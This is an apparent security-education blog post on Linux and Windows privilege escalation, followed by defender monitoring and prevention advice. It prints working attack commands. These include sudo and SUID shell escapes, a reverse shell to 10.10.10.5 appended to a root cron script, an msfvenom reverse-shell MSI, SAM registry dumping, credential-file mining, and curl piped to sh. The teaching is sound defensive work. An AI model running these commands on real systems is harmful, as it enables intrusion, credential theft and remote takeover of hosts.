Privilege Escalation: From User to Admin
How attackers go from low-privilege access to full system control. Linux and Windows techniques, common misconfigurations, and how defenders detect it.
On this page
Ground Up: Attacker's Playbook
Part 5 of 6
View all parts
You’ve exploited a vulnerability and have a shell on the target. But you’re www-data on Linux or a standard user on Windows. You can list files but can’t read /etc/shadow. You can run commands but can’t install software. You’re in, but you’re limited.
Privilege escalation is how you go from limited access to full control - from regular user to root (Linux) or SYSTEM/Administrator (Windows).
This is one of the most critical stages in the kill chain. Without elevated privileges, attackers can’t access sensitive data, install persistent backdoors, or move laterally across the network.
Two Types
Vertical Privilege Escalation
Moving from a lower privilege level to a higher one:
www-data → root (Linux)
Standard User → Administrator → SYSTEM (Windows)This is what most people mean by “privilege escalation.”
Horizontal Privilege Escalation
Moving to another account at the same privilege level:
user-a → user-b (both regular users)Why would you want this? Maybe user-b has access to files you need, belongs to different groups, or has sudo rights that user-a doesn’t.
Linux Privilege Escalation
The Checklist
When you land on a Linux system, here’s what to check systematically:
# 1. Who am I and what can I do?
id
whoami
sudo -l
# 2. What OS and kernel?
uname -a
cat /etc/os-release
# 3. What's running?
ps aux
ss -tlnp
# 4. SUID/SGID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
# 5. Writable files in interesting locations
find /etc -writable -type f 2>/dev/null
find / -writable -type f 2>/dev/null | grep -v proc
# 6. Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
# 7. Interesting files
cat /etc/passwd
ls -la /etc/shadow
find / -name "*.conf" -o -name "*.config" -o -name "*.bak" 2>/dev/nullSudo Misconfigurations
The fastest wins. As covered in the permissions post, sudo -l shows what you can run as root.
sudo -lCommon exploitable entries:
# Can run vim as root → shell escape
(root) NOPASSWD: /usr/bin/vim
# In vim: :!/bin/bash
# Can run find as root → command execution
(root) NOPASSWD: /usr/bin/find
# find . -exec /bin/bash \;
# Can run python as root → spawn shell
(root) NOPASSWD: /usr/bin/python3
# python3 -c 'import os; os.system("/bin/bash")'
# Can run less as root → shell escape
(root) NOPASSWD: /usr/bin/less
# less /etc/passwd → then type !bash
# Can run env as root → run any command
(root) NOPASSWD: /usr/bin/env
# env /bin/bash
# Can run ALL commands → obvious
(root) NOPASSWD: ALL
# sudo /bin/bashCheck GTFOBins for any binary you can run as sudo. It catalogs exploitation techniques for hundreds of Unix binaries.
SUID Binaries
SUID files run with the owner’s permissions. If root owns a SUID binary and it has a vulnerability, you can execute code as root.
find / -perm -4000 -type f 2>/dev/nullStandard SUID binaries (expected):
/usr/bin/passwd,/usr/bin/sudo,/usr/bin/su,/usr/bin/mount
Suspicious SUID binaries (investigate):
- Anything in
/tmp,/home, or/opt - Custom or unusual binaries
- Standard tools that shouldn’t be SUID (
bash,python,vim,find)
# If /usr/bin/bash is SUID:
/usr/bin/bash -p # -p preserves elevated privileges
# If /usr/bin/find is SUID:
find . -exec /bin/sh -p \;
# If /usr/bin/python3 is SUID:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'Cron Job Exploitation
Cron jobs run commands on a schedule. If a cron job runs as root and references a file you can modify, you can inject commands.
# Check system cron jobs
cat /etc/crontab
# Example vulnerable entry:
# * * * * * root /opt/scripts/backup.shIf /opt/scripts/backup.sh is writable by your user:
# Append a reverse shell to the script
echo 'bash -i >& /dev/tcp/10.10.10.5/4444 0>&1' >> /opt/scripts/backup.shNext time cron runs it (as root), you get a root shell.
Also check for:
- Cron jobs with wildcard characters (
tar *in a directory you control) - Cron jobs that run scripts from writable directories
- PATH manipulation (cron job calls
backupwithout full path, and you can create a maliciousbackupin a directory that’s checked first)
Kernel Exploits
The nuclear option. If the kernel version has a known vulnerability, a kernel exploit gives you root directly.
# Check kernel version
uname -r
# Search for exploits
# DirtyPipe (CVE-2022-0847) - Linux 5.8+
# DirtyCow (CVE-2016-5195) - Linux 2.6.22 - 4.8.3
# PwnKit (CVE-2021-4034) - Polkit, affects most Linux distrosKernel exploits are powerful but risky - they can crash the system. Use them as a last resort, especially in production environments.
Password Mining
Credentials hiding in plain sight:
# Search for passwords in files
grep -r "password" /var/www/ 2>/dev/null
grep -r "PASSWORD" /etc/ 2>/dev/null
grep -r "pass=" /opt/ 2>/dev/null
# Check config files
cat /var/www/html/wp-config.php # WordPress DB password
cat /var/www/.env # Application environment variables
cat ~/.bash_history # Command history might contain passwords
# Check for SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/nullDatabase passwords in web app configs are especially valuable - they often get reused for other accounts.
Windows Privilege Escalation
The Checklist
# 1. Who am I?
whoami
whoami /priv
whoami /groups
# 2. System info
systeminfo
# 3. Unusual services
Get-Service | Where-Object {$_.Status -eq "Running"}
wmic service get name,pathname,startmode | findstr /i "auto"
# 4. Scheduled tasks
schtasks /query /fo LIST /v
# 5. Installed software
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |
Select-Object DisplayName
# 6. Check for stored credentials
cmdkey /list
# 7. Network shares
net shareToken Privileges
Windows assigns privileges to tokens. Some are exploitable:
whoami /priv| Privilege | Exploitation |
|---|---|
SeImpersonatePrivilege | Potato attacks (JuicyPotato, PrintSpoofer, GodPotato) → SYSTEM |
SeAssignPrimaryTokenPrivilege | Similar to SeImpersonate |
SeBackupPrivilege | Read any file on the system |
SeRestorePrivilege | Write any file on the system |
SeTakeOwnershipPrivilege | Take ownership of any object |
SeDebugPrivilege | Debug any process (inject code into SYSTEM processes) |
SeImpersonatePrivilege is the most common win. Service accounts (like IIS/MSSQL) often have it. The Potato family of exploits turns this into SYSTEM access:
# PrintSpoofer example
PrintSpoofer.exe -i -c "cmd"
# Result: SYSTEM shellUnquoted Service Paths
If a Windows service path contains spaces and isn’t quoted, Windows searches for executables in unexpected locations:
Service path: C:\Program Files\My App\service.exe (UNQUOTED)
Windows tries:
1. C:\Program.exe
2. C:\Program Files\My.exe
3. C:\Program Files\My App\service.exeIf you can write to C:\Program Files\My.exe, your executable runs instead - as the service account (often SYSTEM).
# Find unquoted service paths
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /v """Service Binary Hijacking
If you can modify the binary that a service runs, replace it with a malicious one:
# Check permissions on service binary
icacls "C:\Program Files\VulnApp\service.exe"
# If your user has write access, replace itStop the service → replace the binary → start the service → your code runs as SYSTEM.
AlwaysInstallElevated
A registry setting that allows any .msi to install with SYSTEM privileges:
# Check if enabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedIf both return 0x1, you can create a malicious MSI that runs as SYSTEM:
# On attacker machine (Kali)
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f msi -o shell.msiStored Credentials
Windows sometimes stores credentials that can be reused:
# Saved credentials
cmdkey /list
# If credentials are stored, use them
runas /savecred /user:admin cmd.exe
# SAM database (if you have backup privileges)
reg save HKLM\SAM sam.bak
reg save HKLM\SYSTEM system.bak
# Then extract hashes offlinePassword Mining (Windows)
# Search for passwords in files
findstr /si "password" *.txt *.xml *.config *.ini
# Common credential locations
type C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\Login Data
type C:\inetpub\wwwroot\web.config
type C:\Windows\Panther\unattend.xmlunattend.xml from Windows deployment often contains the local admin password in Base64.
Automated Enumeration Tools
Manual enumeration is thorough but slow. These tools automate the checklist:
Linux
- LinPEAS - Comprehensive Linux privilege escalation checker
- LinEnum - Linux enumeration script
- linux-exploit-suggester - Matches kernel version to known exploits
# Download and run LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | shWindows
- WinPEAS - Comprehensive Windows privilege escalation checker
- PowerUp (PowerSploit) - PowerShell privesc checker
- Seatbelt - C# security audit tool
# Run WinPEAS
.\winPEASx64.exeThese tools check everything we’ve discussed and more. They’re standard in pentesting. Run them, read the output carefully, and investigate anything highlighted.
Detection and Defense
What Defenders Should Monitor
| Indicator | What It Means |
|---|---|
sudo -l enumeration | User checking their privileges (pre-escalation) |
SUID file search (find -perm -4000) | Looking for escalation paths |
| New SUID files appearing | Possible backdoor |
/etc/shadow access attempts | Password hash theft |
Kernel exploit compilation (gcc, make) | Building kernel exploit |
whoami /priv on Windows | Token privilege enumeration |
| Service binary modifications | Possible service hijacking |
| Registry changes to Run keys | Persistence after escalation |
| Unexpected SYSTEM-level processes | Successful escalation |
Prevention
- Minimal sudo rights - Only grant what’s needed, never
ALL - Audit SUID binaries - Remove SUID from anything that doesn’t need it
- Patch kernels - Kernel exploits are the most reliable escalation method
- Secure cron jobs - Use full paths, set proper permissions on scripts
- Remove stored credentials - Don’t save passwords in plaintext configs
- Quote service paths - Prevent unquoted service path exploitation
- Restrict token privileges - Don’t grant SeImpersonate unless necessary
What’s Next
Privilege escalation gets you power on one system. The next post covers a different kind of escalation - exploiting humans instead of systems. Social engineering is how most attacks start and why technical controls alone aren’t enough.
References
- GTFOBins - Unix binary exploitation reference
- LOLBAS - Windows Living Off the Land binaries
- HackTricks - Linux Privilege Escalation
- HackTricks - Windows Privilege Escalation
- PEASS-ng (LinPEAS/WinPEAS)
Getting a shell is step one. Getting root is step two. Most systems have a path from one to the other - your job is to find it (or close it, depending on which side you’re on).
Related Articles
Hardening 101: Practical Steps to Secure Systems
Practical system hardening for Linux and Windows - reducing attack surface, configuring firewalls, applying least privilege, and closing the gaps attackers exploit.
Reverse Shells Explained: The Complete Foundation
What reverse shells are, why attackers use them, how they work under the hood, and where they fit in the attack chain. The foundation before you touch a terminal.
Authentication Attacks: Passwords, Sessions, and Tokens
How login systems break - brute force, credential stuffing, session hijacking, token flaws, and MFA bypass. The complete beginner's guide to auth attacks.